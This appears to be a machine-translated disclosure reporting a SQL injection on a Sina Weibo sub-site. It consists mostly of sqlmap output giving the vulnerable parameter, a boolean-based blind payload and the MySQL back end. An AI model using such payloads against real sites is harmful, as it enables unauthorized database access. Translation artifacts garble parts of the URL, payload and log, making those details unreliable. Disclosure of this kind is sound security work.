A sub-station on Sina Weibo has SQL injection to be filtered
SQL Injection exists in a substation on Sina Weibo
URL: http://xueyuan.weibo.com/course/index? Categoryid = & orderby_fild = 3 & orderby_operate = desc & key_word = foreign t _ type = 0 parameter: key_word
GET parameter 'key _ word' is vulnerable. Do you want to keep testing the others (
If any )? [Y/N] n
Sqlmap identified the following injection points with a total of 9 HTTP (s) reque
Sts:
---
Place: GET
Parameter: key_word
Type: boolean-based blind
Title: AND boolean-based blind-WHERE or HAVING clause
Payload: categoryid = & orderby_fild = 3 & orderby_operate = desc & key_word = % 'and (1 = 1
AND 2283 = 2283) and '%' = '0000t _ type = 0
---
[10:25:40] [WARNING] changes made by tampering scripts are not supported ded in shown
Payload content (s)
[10:25:40] [INFO] testing MySQL
[10:25:44] [INFO] confirming MySQL
[10:25:52] [INFO] the back-end DBMS is MySQL
Back-end DBMS: MySQL> = 5.0.0
Solution:
Filter